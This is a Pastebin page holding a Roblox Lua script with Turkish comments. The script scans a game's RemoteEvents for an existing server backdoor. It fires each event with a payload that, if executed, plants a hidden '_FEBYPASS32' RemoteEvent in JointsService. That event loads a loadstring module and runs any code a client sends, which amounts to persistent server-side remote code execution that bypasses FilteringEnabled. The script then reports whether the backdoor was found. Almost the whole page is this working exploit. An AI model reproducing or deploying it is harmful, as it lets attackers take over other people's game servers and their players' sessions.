Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -- Scanner Başlangıcı
- local timeout = 5
- local timer = 0
- -- Remote tarama fonksiyonu
- local function scanForRemote(parent)
- for _, child in pairs(parent:GetDescendants()) do
- if child:IsA("RemoteEvent") then
- pcall(function()
- child:FireServer([[
- local folder = Instance.new('RemoteEvent')
- folder.Name = "_FEBYPASS32"
- folder.Parent = game:GetService("JointsService")
- local loadstring = require(13684410229)
- folder.OnServerEvent:Connect(function(_1,_2)
- loadstring(_2)()
- end)
- ]])
- end)
- end
- end
- end
- -- RemoteEvent'leri tara
- scanForRemote(game:GetService("ReplicatedStorage"))
- -- Sonuç kontrolü
- repeat wait(0.1) timer += 0.1 until game:GetService("JointsService"):FindFirstChild("_FEBYPASS32") or timer >= timeout
- if game:GetService("JointsService"):FindFirstChild("_FEBYPASS32") then
- print("✅ Backdoor bulundu!")
- else
- print("❌ Backdoor bulunamadı.")
- end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement